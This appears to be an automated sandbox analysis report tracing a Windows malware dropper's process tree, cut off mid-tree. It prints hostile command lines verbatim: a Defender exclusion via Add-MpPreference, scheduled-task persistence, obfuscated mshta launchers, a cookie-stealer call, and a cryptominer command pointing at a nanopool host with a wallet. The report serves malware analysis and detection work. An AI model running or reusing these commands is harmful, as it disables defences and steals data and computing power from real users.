Uno.exe.com 5988 Uno.exe.com 5988 Uno.exe.com 6460 Conhost.exe 6460 Conhost.exe 6460 Conhost.exe 5940 Uno.exe.com 5940 Uno.exe.com 5940 Uno.exe.com 1564 Uno.exe.com 1564 Uno.exe.com 1564 Uno.exe.com 6316 Uno.exe.com -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
6449.exepid process 6712 6449.exe -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
Explorer.EXEpid process 3120 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
71E2CF4709767EAB8E0E6DCD8F19D37C.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exeMon000d7b2b59b9.exeMon00b1849cf0bf91e9.exedescription pid process target process PID 5476 wrote to memory of 5720 5476 71E2CF4709767EAB8E0E6DCD8F19D37C.exe setup_install.exe PID 5476 wrote to memory of 5720 5476 71E2CF4709767EAB8E0E6DCD8F19D37C.exe setup_install.exe PID 5476 wrote to memory of 5720 5476 71E2CF4709767EAB8E0E6DCD8F19D37C.exe setup_install.exe PID 5720 wrote to memory of 5980 5720 setup_install.exe cmd.exe PID 5720 wrote to memory of 5980 5720 setup_install.exe cmd.exe PID 5720 wrote to memory of 5980 5720 setup_install.exe cmd.exe PID 5720 wrote to memory of 6000 5720 setup_install.exe cmd.exe PID 5720 wrote to memory of 6000 5720 setup_install.exe cmd.exe PID 5720 wrote to memory of 6000 5720 setup_install.exe cmd.exe PID 5720 wrote to memory of 6016 5720 setup_install.exe cmd.exe PID 5720 wrote to memory of 6016 5720 setup_install.exe cmd.exe PID 5720 wrote to memory of 6016 5720 setup_install.exe cmd.exe PID 5720 wrote to memory of 6048 5720 setup_install.exe cmd.exe PID 5720 wrote to memory of 6048 5720 setup_install.exe cmd.exe PID 5720 wrote to memory of 6048 5720 setup_install.exe cmd.exe PID 5720 wrote to memory of 4380 5720 setup_install.exe cmd.exe PID 5720 wrote to memory of 4380 5720 setup_install.exe cmd.exe PID 5720 wrote to memory of 4380 5720 setup_install.exe cmd.exe PID 5720 wrote to memory of 1640 5720 setup_install.exe cmd.exe PID 5720 wrote to memory of 1640 5720 setup_install.exe cmd.exe PID 5720 wrote to memory of 1640 5720 setup_install.exe cmd.exe PID 5720 wrote to memory of 1104 5720 setup_install.exe cmd.exe PID 5720 wrote to memory of 1104 5720 setup_install.exe cmd.exe PID 5720 wrote to memory of 1104 5720 setup_install.exe cmd.exe PID 5720 wrote to memory of 1884 5720 setup_install.exe cmd.exe PID 5720 wrote to memory of 1884 5720 setup_install.exe cmd.exe PID 5720 wrote to memory of 1884 5720 setup_install.exe cmd.exe PID 5720 wrote to memory of 5304 5720 setup_install.exe cmd.exe PID 5720 wrote to memory of 5304 5720 setup_install.exe cmd.exe PID 5720 wrote to memory of 5304 5720 setup_install.exe cmd.exe PID 6016 wrote to memory of 5128 6016 cmd.exe Mon001af0f6251.exe PID 6016 wrote to memory of 5128 6016 cmd.exe Mon001af0f6251.exe PID 6016 wrote to memory of 5128 6016 cmd.exe Mon001af0f6251.exe PID 6048 wrote to memory of 1712 6048 cmd.exe Mon0001207aa1161f.exe PID 6048 wrote to memory of 1712 6048 cmd.exe Mon0001207aa1161f.exe PID 5720 wrote to memory of 4492 5720 setup_install.exe cmd.exe PID 5720 wrote to memory of 4492 5720 setup_install.exe cmd.exe PID 5720 wrote to memory of 4492 5720 setup_install.exe cmd.exe PID 1884 wrote to memory of 5544 1884 cmd.exe Mon00e8b91b250904.exe PID 1884 wrote to memory of 5544 1884 cmd.exe Mon00e8b91b250904.exe PID 6000 wrote to memory of 5640 6000 cmd.exe Mon000d7b2b59b9.exe PID 6000 wrote to memory of 5640 6000 cmd.exe Mon000d7b2b59b9.exe PID 6000 wrote to memory of 5640 6000 cmd.exe Mon000d7b2b59b9.exe PID 5980 wrote to memory of 3220 5980 cmd.exe powershell.exe PID 5980 wrote to memory of 3220 5980 cmd.exe powershell.exe PID 5980 wrote to memory of 3220 5980 cmd.exe powershell.exe PID 4492 wrote to memory of 5792 4492 cmd.exe Mon0015a1e17ea5.exe PID 4492 wrote to memory of 5792 4492 cmd.exe Mon0015a1e17ea5.exe PID 4380 wrote to memory of 5960 4380 cmd.exe Mon00a4b905d6fcf0a9.exe PID 4380 wrote to memory of 5960 4380 cmd.exe Mon00a4b905d6fcf0a9.exe PID 4380 wrote to memory of 5960 4380 cmd.exe Mon00a4b905d6fcf0a9.exe PID 5304 wrote to memory of 6092 5304 cmd.exe Mon00b1849cf0bf91e9.exe PID 5304 wrote to memory of 6092 5304 cmd.exe Mon00b1849cf0bf91e9.exe PID 5304 wrote to memory of 6092 5304 cmd.exe Mon00b1849cf0bf91e9.exe PID 1640 wrote to memory of 5716 1640 cmd.exe Mon00f61d292f523.exe PID 1640 wrote to memory of 5716 1640 cmd.exe Mon00f61d292f523.exe PID 1640 wrote to memory of 5716 1640 cmd.exe Mon00f61d292f523.exe PID 1104 wrote to memory of 6136 1104 cmd.exe Mon00271bbb5e.exe PID 1104 wrote to memory of 6136 1104 cmd.exe Mon00271bbb5e.exe PID 1104 wrote to memory of 6136 1104 cmd.exe Mon00271bbb5e.exe PID 5640 wrote to memory of 5936 5640 Mon000d7b2b59b9.exe Mon000d7b2b59b9.exe PID 5640 wrote to memory of 5936 5640 Mon000d7b2b59b9.exe Mon000d7b2b59b9.exe PID 5640 wrote to memory of 5936 5640 Mon000d7b2b59b9.exe Mon000d7b2b59b9.exe PID 6092 wrote to memory of 3560 6092 Mon00b1849cf0bf91e9.exe dllhost.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
PID:3120 -
C:\Users\Admin\AppData\Local\Temp\71E2CF4709767EAB8E0E6DCD8F19D37C.exe"C:\Users\Admin\AppData\Local\Temp\71E2CF4709767EAB8E0E6DCD8F19D37C.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:5476 -
C:\Users\Admin\AppData\Local\Temp\7zS4650C293\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS4650C293\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:5720 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
PID:5980 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3220
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon000d7b2b59b9.exe4⤵
- Suspicious use of WriteProcessMemory
PID:6000 -
C:\Users\Admin\AppData\Local\Temp\7zS4650C293\Mon000d7b2b59b9.exeMon000d7b2b59b9.exe5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:5640 -
C:\Users\Admin\AppData\Local\Temp\7zS4650C293\Mon000d7b2b59b9.exe"C:\Users\Admin\AppData\Local\Temp\7zS4650C293\Mon000d7b2b59b9.exe" -a6⤵
- Executes dropped EXE
PID:5936
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon001af0f6251.exe4⤵
- Suspicious use of WriteProcessMemory
PID:6016 -
C:\Users\Admin\AppData\Local\Temp\7zS4650C293\Mon001af0f6251.exeMon001af0f6251.exe5⤵
- Executes dropped EXE
PID:5128 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5128 -s 2566⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:3772
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon0001207aa1161f.exe4⤵
- Suspicious use of WriteProcessMemory
PID:6048 -
C:\Users\Admin\AppData\Local\Temp\7zS4650C293\Mon0001207aa1161f.exeMon0001207aa1161f.exe5⤵
- Executes dropped EXE
PID:1712
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon00a4b905d6fcf0a9.exe4⤵
- Suspicious use of WriteProcessMemory
PID:4380 -
C:\Users\Admin\AppData\Local\Temp\7zS4650C293\Mon00a4b905d6fcf0a9.exeMon00a4b905d6fcf0a9.exe5⤵
- Executes dropped EXE
PID:5960 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5960 -s 2566⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:4008
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon00f61d292f523.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1640 -
C:\Users\Admin\AppData\Local\Temp\7zS4650C293\Mon00f61d292f523.exeMon00f61d292f523.exe5⤵
- Executes dropped EXE
PID:5716 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5716 -s 2966⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5844
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon00271bbb5e.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1104 -
C:\Users\Admin\AppData\Local\Temp\7zS4650C293\Mon00271bbb5e.exeMon00271bbb5e.exe5⤵
- Executes dropped EXE
PID:6136 -
C:\Users\Admin\Documents\SK60YKig2V4zoBUiGScf6z94.exe"C:\Users\Admin\Documents\SK60YKig2V4zoBUiGScf6z94.exe"6⤵
- Executes dropped EXE
PID:6212 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
PID:1196
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
PID:6564
-
-
-
C:\Users\Admin\Documents\iABSwCq9xEEiihZKEGl3NhzE.exe"C:\Users\Admin\Documents\iABSwCq9xEEiihZKEGl3NhzE.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6356 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6356 -s 15047⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:2000
-
-
-
C:\Users\Admin\Documents\3VtLOyuSluoEP4r0Sz3DJnoG.exe"C:\Users\Admin\Documents\3VtLOyuSluoEP4r0Sz3DJnoG.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6328 -
C:\Users\Admin\Documents\3VtLOyuSluoEP4r0Sz3DJnoG.exeC:\Users\Admin\Documents\3VtLOyuSluoEP4r0Sz3DJnoG.exe7⤵
- Executes dropped EXE
PID:2444
-
-
C:\Users\Admin\Documents\3VtLOyuSluoEP4r0Sz3DJnoG.exeC:\Users\Admin\Documents\3VtLOyuSluoEP4r0Sz3DJnoG.exe7⤵
- Executes dropped EXE
PID:7156
-
-
-
C:\Users\Admin\Documents\mqZaRVtHqF8rycvtbmKpqRN4.exe"C:\Users\Admin\Documents\mqZaRVtHqF8rycvtbmKpqRN4.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6308
-
-
C:\Users\Admin\Documents\ygmMAvbLwau6uzydIDUf0r01.exe"C:\Users\Admin\Documents\ygmMAvbLwau6uzydIDUf0r01.exe"6⤵
- Executes dropped EXE
PID:6300
-
-
C:\Users\Admin\Documents\tvu91LP1ztkkTQGIrTRUNBH_.exe"C:\Users\Admin\Documents\tvu91LP1ztkkTQGIrTRUNBH_.exe"6⤵
- Executes dropped EXE
PID:6292
-
-
C:\Users\Admin\Documents\CilL84Z3K9TwE9OeT2_8H7Cj.exe"C:\Users\Admin\Documents\CilL84Z3K9TwE9OeT2_8H7Cj.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6256
-
-
C:\Users\Admin\Documents\f9kpkTIv_7sacBa4AgtedA10.exe"C:\Users\Admin\Documents\f9kpkTIv_7sacBa4AgtedA10.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6240 -
C:\Users\Admin\AppData\Roaming\7989597.exe"C:\Users\Admin\AppData\Roaming\7989597.exe"7⤵
- Executes dropped EXE
PID:4884 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4884 -s 22968⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5156
-
-
-
C:\Users\Admin\AppData\Roaming\5512077.exe"C:\Users\Admin\AppData\Roaming\5512077.exe"7⤵PID:2112
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"8⤵
- Suspicious behavior: EnumeratesProcesses
PID:6136
-
-
-
C:\Users\Admin\AppData\Roaming\4927799.exe"C:\Users\Admin\AppData\Roaming\4927799.exe"7⤵PID:3880
-
-
C:\Users\Admin\AppData\Roaming\2589432.exe"C:\Users\Admin\AppData\Roaming\2589432.exe"7⤵PID:2932
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2932 -s 23048⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1556
-
-
-
-
C:\Users\Admin\Documents\5JdvbFzz5mlDvs0aBY2GW8QG.exe"C:\Users\Admin\Documents\5JdvbFzz5mlDvs0aBY2GW8QG.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6228
-
-
C:\Users\Admin\Documents\CqQvCDQIKdt4Ibiq7B0qzude.exe"C:\Users\Admin\Documents\CqQvCDQIKdt4Ibiq7B0qzude.exe"6⤵PID:6468
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6468 -s 2727⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:3268
-
-
-
C:\Users\Admin\Documents\72VIZoJACbUqw_i9cfs1uNHk.exe"C:\Users\Admin\Documents\72VIZoJACbUqw_i9cfs1uNHk.exe"6⤵PID:6460
-
C:\Users\Admin\Documents\72VIZoJACbUqw_i9cfs1uNHk.exeC:\Users\Admin\Documents\72VIZoJACbUqw_i9cfs1uNHk.exe7⤵
- Executes dropped EXE
PID:6544
-
-
-
C:\Users\Admin\Documents\Nq_3F5ekjxAFw0C9puS4Fehc.exe"C:\Users\Admin\Documents\Nq_3F5ekjxAFw0C9puS4Fehc.exe"6⤵
- Executes dropped EXE
PID:6440 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6440 -s 3167⤵
- Program crash
PID:1188
-
-
-
C:\Users\Admin\Documents\4ZZBKS8grL61WRswRHXgKOPQ.exe"C:\Users\Admin\Documents\4ZZBKS8grL61WRswRHXgKOPQ.exe"6⤵PID:6432
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6432 -s 2927⤵
- Program crash
PID:796
-
-
-
C:\Users\Admin\Documents\NlEyHgR5tpkeMGof82h6WWZE.exe"C:\Users\Admin\Documents\NlEyHgR5tpkeMGof82h6WWZE.exe"6⤵
- Executes dropped EXE
PID:6664
-
-
C:\Users\Admin\Documents\WeitOOFgEpAbhQaUpI5l8OGp.exe"C:\Users\Admin\Documents\WeitOOFgEpAbhQaUpI5l8OGp.exe"6⤵
- Executes dropped EXE
PID:6812 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6812 -s 3087⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6532
-
-
-
C:\Users\Admin\Documents\YsajQFAfcsspPaWnUuSSrlFc.exe"C:\Users\Admin\Documents\YsajQFAfcsspPaWnUuSSrlFc.exe"6⤵
- Executes dropped EXE
PID:6796
-
-
C:\Users\Admin\Documents\lgqw6xe2U_T8KcnVrPXg4e3S.exe"C:\Users\Admin\Documents\lgqw6xe2U_T8KcnVrPXg4e3S.exe"6⤵
- Executes dropped EXE
PID:6772 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6772 -s 2767⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:2224
-
-
-
C:\Users\Admin\Documents\7sjvPdTv85_dDN7p79YDscqa.exe"C:\Users\Admin\Documents\7sjvPdTv85_dDN7p79YDscqa.exe"6⤵
- Executes dropped EXE
PID:7028 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRipt:ClOSe( creATEoBJEcT("WscRIpT.sHEll" ).RUN("Cmd /Q /C tYPe ""C:\Users\Admin\Documents\7sjvPdTv85_dDN7p79YDscqa.exe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if """" == """" for %W iN ( ""C:\Users\Admin\Documents\7sjvPdTv85_dDN7p79YDscqa.exe"" ) do taskkill -IM ""%~nXW"" -f " ,0 ,TRUE ) )7⤵PID:2136
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\Documents\7sjvPdTv85_dDN7p79YDscqa.exe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if ""=="" for %W iN ( "C:\Users\Admin\Documents\7sjvPdTv85_dDN7p79YDscqa.exe") do taskkill -IM "%~nXW" -f8⤵PID:6540
-
C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXeWO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu99⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:1188 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRipt:ClOSe( creATEoBJEcT("WscRIpT.sHEll" ).RUN("Cmd /Q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if ""-PifOcLbay~PF~N8a_e9RyKpu9 "" == """" for %W iN ( ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" ) do taskkill -IM ""%~nXW"" -f " ,0 ,TRUE ) )10⤵PID:6084
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "-PifOcLbay~PF~N8a_e9RyKpu9 "=="" for %W iN ( "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe") do taskkill -IM "%~nXW" -f11⤵PID:2132
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" ~IWm4Wh.I,nKhkoYTFE10⤵
- Loads dropped DLL
PID:6688
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -IM "7sjvPdTv85_dDN7p79YDscqa.exe" -f9⤵
- Kills process with taskkill
PID:2840
-
-
-
-
-
C:\Users\Admin\Documents\wvmD8oKBBaVONnn11oGH1rUI.exe"C:\Users\Admin\Documents\wvmD8oKBBaVONnn11oGH1rUI.exe"6⤵
- Executes dropped EXE
PID:6972 -
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"7⤵
- Executes dropped EXE
PID:3152
-
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"7⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:5128
-
-
C:\Program Files (x86)\Company\NewProduct\inst1.exe"C:\Program Files (x86)\Company\NewProduct\inst1.exe"7⤵
- Executes dropped EXE
PID:868
-
-
C:\Program Files (x86)\Company\NewProduct\jooyu.exe"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"7⤵
- Executes dropped EXE
PID:7020 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵
- Executes dropped EXE
PID:3060
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵PID:6936
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵PID:4440
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵PID:5752
-
-
-
-
C:\Users\Admin\Documents\Xi4HqKZZXc1thEIujg7aeJVU.exe"C:\Users\Admin\Documents\Xi4HqKZZXc1thEIujg7aeJVU.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6180 -
C:\Users\Admin\Documents\Xi4HqKZZXc1thEIujg7aeJVU.exe"C:\Users\Admin\Documents\Xi4HqKZZXc1thEIujg7aeJVU.exe"7⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:6508
-
-
-
C:\Users\Admin\Documents\B9NHu0grQz6OXEWRIPx6jRwF.exe"C:\Users\Admin\Documents\B9NHu0grQz6OXEWRIPx6jRwF.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:7144
-
-
C:\Users\Admin\Documents\sfDwcltTn4GsBKM_Hu2EqxdJ.exe"C:\Users\Admin\Documents\sfDwcltTn4GsBKM_Hu2EqxdJ.exe"6⤵
- Executes dropped EXE
PID:720
-
-
C:\Users\Admin\Documents\StuWzOHhE5uh6G5HONiqHht3.exe"C:\Users\Admin\Documents\StuWzOHhE5uh6G5HONiqHht3.exe"6⤵
- Executes dropped EXE
PID:2380
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon0015a1e17ea5.exe4⤵
- Suspicious use of WriteProcessMemory
PID:4492 -
C:\Users\Admin\AppData\Local\Temp\7zS4650C293\Mon0015a1e17ea5.exeMon0015a1e17ea5.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5792 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵
- Executes dropped EXE
PID:5592 -
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5876 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵PID:6568
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
PID:1192
-
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6204 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit9⤵PID:1292
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'10⤵
- Creates scheduled task(s)
PID:5388
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"9⤵PID:5932
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth9⤵PID:2848
-
C:\Program Files (x86)\P3f8p\rz_vzw.exe"C:\Program Files (x86)\P3f8p\rz_vzw.exe"10⤵PID:6736
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\test.exe"C:\Users\Admin\AppData\Local\Temp\test.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:3932
-
-
C:\Users\Admin\AppData\Local\Temp\1.exe"C:\Users\Admin\AppData\Local\Temp\1.exe"7⤵PID:5664
-
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"7⤵
- Suspicious use of AdjustPrivilegeToken
PID:5544
-
-
C:\Users\Admin\AppData\Local\Temp\3.exe"C:\Users\Admin\AppData\Local\Temp\3.exe"7⤵PID:3624
-
-
C:\Users\Admin\AppData\Local\Temp\4.exe"C:\Users\Admin\AppData\Local\Temp\4.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1308 -
C:\Users\Admin\AppData\Local\Temp\tmpF293_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmpF293_tmp.exe"8⤵
- Executes dropped EXE
PID:3320 -
C:\Windows\SysWOW64\dllhost.exe"C:\Windows\System32\dllhost.exe"9⤵PID:500
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Melagrani.wmv9⤵PID:6284
-
C:\Windows\SysWOW64\cmd.execmd10⤵PID:6396
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^zFErbtxvxCRvOCdCwQQLKtqeCGqPfWUhoIWRIBgiXSPjcbyBMIFqYBjfFBARtFubIEguGmUmBJOSgNHyAnrHdTgGcGkiwvraMsDRpZVjNunfMxqRUcdFCnuOfHKZhNnyFvuWlPVBDQTlxZTwGz$" Rivederci.wmv11⤵PID:2972
-
-
C:\Windows\SysWOW64\PING.EXEping YJTUIPJF -n 3011⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Runs ping.exe
PID:2284
-
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uno.exe.comUno.exe.com B11⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:6124 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uno.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uno.exe.com B12⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:6088 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uno.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uno.exe.com B13⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5512 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uno.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uno.exe.com B14⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3984 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uno.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uno.exe.com B15⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1996 -
